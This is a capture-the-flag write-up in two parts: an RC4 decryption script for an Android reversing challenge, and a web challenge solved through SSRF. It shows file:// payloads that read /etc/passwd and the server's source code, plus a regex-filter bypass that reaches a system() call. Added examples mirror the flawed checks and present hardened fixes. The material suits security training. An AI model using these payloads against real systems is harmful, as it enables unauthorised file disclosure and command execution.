1. RE-babyandroid
Opening the apk in jadx, the key source code is as follows:
Reading on through initKey and babycrypt: init builds the key state, then babycrypt swaps key entries and XORs, which looks exactly like RC4.
Trying that works.
Or write the exploit script yourself:
def initKey(key):
    # RC4 key-scheduling (KSA): build the 256-entry permutation from the key
    state = [i for i in range(256)]
    index1 = 0
    index2 = 0
    for i2 in range(256):
        index2 = ((key[index1] & 255) + (state[i2] & 255) + index2) & 255
        tmp = state[i2]
        state[i2] = state[index2]
        state[index2] = tmp
        index1 = (index1 + 1) % len(key)
    return state

def decode(input, mKkey):
    # RC4 keystream generation (PRGA), XORed with the input
    x = 0
    y = 0
    key = initKey(mKkey)
    result = []
    for i in range(len(input)):
        x = (x + 1) & 255
        y = ((key[x] & 255) + y) & 255
        tmp = key[x]
        key[x] = key[y]
        key[y] = tmp
        # input holds Java signed bytes, so mask the XOR result back to 0..255
        result.append(chr((input[i] ^ key[((key[x] & 255) + (key[y] & 255)) & 255]) & 0xFF))
    return result

def main():
    # ciphertext as dumped from the apk (Java signed bytes)
    compare = [-79, 120, 21, 51, -32, -101, -56, -65, -4, -31, 79, 124, -9, -79, -88, 42, -69, 99, -15, 45, 48, -53, 20, -97, 108, -60, 67, -51]
    # key "abcdefg" as byte values
    f110k = [97, 98, 99, 100, 101, 102, 103]
    result = decode(compare, f110k)
    print(''.join(result))

if __name__ == '__main__':
    main()
# prints DASCTF{2ndro1d_cr3pt_by_rc4}
The flag obtained:
DASCTF{2ndro1d_cr3pt_by_rc4}
2. WEB-Try2ReadFlag
Challenge description
Name: Try2ReadFlag
Content: Xiaoming set up a test site, but what is this site for?
Points: 100.0
Difficulty: Easy
Opening the challenge shows the following page
Clicking Page1, Page2 and Page3 at the bottom, the URL changes as follows
http://80.endpoint-021e3537e5ad441a9def50cfe3ccff9c.m.ins.cloud.dasctf.com:81/index.php?url=http://127.0.0.1/3.html
That points to an SSRF vulnerability, so the file protocol can be used to read local files; first try reading /etc/passwd
http://80.endpoint-021e3537e5ad441a9def50cfe3ccff9c.m.ins.cloud.dasctf.com:81/index.php?url=file:///etc/passwd
It can be read. Trying /flag fails, so the flag file probably has a different name.
Next read the index.php file
http://80.endpoint-021e3537e5ad441a9def50cfe3ccff9c.m.ins.cloud.dasctf.com:81/index.php?url=file:///var/www/html/index.php
Right-click and view source shows the following code
<?php
error_reporting(0);
$url = $_GET['url'];
$input = explode(":", $url)[0];
if ($input == "http" or $input == "file" ){
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_exec($ch);
    curl_close($ch);
}
?>
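The check above only looks at the text before the first ":" and accepts "file", which is exactly what lets file:///etc/passwd through. As an added example (not part of the writeup or the challenge code), the Python below mirrors that check next to an allowlist-based one: scheme restricted to http(s), literal loopback/private addresses refused, and the host compared against an assumed allowlist (pages.example is a placeholder hostname, not from the challenge).

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed sample URLs mirroring the requests in the writeup; the hostname
# pages.example is an assumed placeholder for the site's own page server.
SAMPLES = [
    "http://127.0.0.1/3.html",
    "file:///etc/passwd",
    "file:///var/www/html/flag.php",
    "http://pages.example/3.html",
]

# Assumed allowlist: the only hosts the page fetcher should ever contact.
ALLOWED_HOSTS = {"pages.example"}


def challenge_check(url: str) -> bool:
    """Mirror of the challenge's PHP check: the text before the first ':'
    must be 'http' or 'file', so file:///etc/passwd passes."""
    scheme = url.split(":", 1)[0]
    return scheme in ("http", "file")


def hardened_check(url: str) -> bool:
    """Allowlist-based check: http(s) only, no literal loopback/private
    addresses, and the host must be on the allowlist."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False  # rejects file://, gopher://, dict:// and friends
    host = parts.hostname
    if not host:
        return False
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None  # a hostname rather than a literal address
    if ip is not None and (ip.is_loopback or ip.is_private or ip.is_link_local):
        return False
    return host in ALLOWED_HOSTS


def audit(urls=SAMPLES):
    """Return {url: (challenge_check result, hardened_check result)}."""
    return {u: (challenge_check(u), hardened_check(u)) for u in urls}


if __name__ == "__main__":
    for url, (old, new) in audit().items():
        print(f"{url:40} challenge={old!s:5} hardened={new}")
```

A hostname allowlist is still only half the fix: the address the name resolves to has to be re-checked when the connection is made, and in the PHP fetcher itself curl should additionally be limited to http(s) with CURLOPT_PROTOCOLS so a redirect cannot reintroduce file://.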
So the http and file protocols are both allowed; nothing else stands out there. Brute-forcing the directory reveals a flag.php file
http://80.endpoint-021e3537e5ad441a9def50cfe3ccff9c.m.ins.cloud.dasctf.com:81/index.php?url=file:///var/www/html/flag.php
Reading its source shows
<?php
error_reporting(0);
$input = $_POST['input'];
if(preg_match('/cat.+?flag/is', $input)) { // .*? matches any number of characters, .+? requires at least one
    die("no");
}
if ((substr($input,0,3) == "cat") and (substr($input,-4,4)=="flag")){ // first three characters: cat, last four characters: flag
    echo system("ls /");
}
So the payload just has to put no characters at all between cat and flag: `.+?` needs at least one character, so the pattern never matches and the die() above is bypassed
input=catflag
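The gap is the one-character minimum of `.+?`. As an added example (not part of the writeup), the Python below reproduces the flag.php deny pattern and substr gate, then runs the same inputs against a pattern using `.*?`, which also matches the empty string; the sample inputs are constructed.

```python
import re

# The challenge's deny pattern from flag.php: blocks 'cat', at least ONE
# character, then 'flag' (case-insensitive, '.' also matching newlines).
CHALLENGE_PATTERN = re.compile(r"cat.+?flag", re.I | re.S)

# Corrected pattern: '.*?' also matches the empty string, so 'catflag'
# is caught as well.
FIXED_PATTERN = re.compile(r"cat.*?flag", re.I | re.S)


def prefix_suffix_gate(s: str) -> bool:
    """Mirror of the PHP substr() gate: first three chars 'cat', last four 'flag'."""
    return s[:3] == "cat" and s[-4:] == "flag"


def challenge_accepts(s: str) -> bool:
    """True when the input reaches system() under the original filter."""
    return CHALLENGE_PATTERN.search(s) is None and prefix_suffix_gate(s)


def fixed_accepts(s: str) -> bool:
    """Same gate, but with the corrected deny pattern."""
    return FIXED_PATTERN.search(s) is None and prefix_suffix_gate(s)


# Constructed inputs: the writeup's payload plus a few neighbours.
SAMPLES = ["catflag", "cat flag", "cat /flag", "catFLAG", "dog flag"]


def audit(inputs=SAMPLES):
    """Return {input: (accepted_by_challenge, accepted_by_fixed)}."""
    return {s: (challenge_accepts(s), fixed_accepts(s)) for s in inputs}


if __name__ == "__main__":
    for s, (old, new) in audit().items():
        print(f"{s!r:12} original={old!s:5} fixed={new}")
```

With `.*?` every string that satisfies the substr gate also matches the deny pattern, so nothing reaches system(); the original `.+?` leaves exactly one string, catflag, in the gap between the two checks.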
This gives the flag file name F1agg_f1ag
Then read that file through the file protocol
The flag obtained:
flag{39418652103944976554117681913396}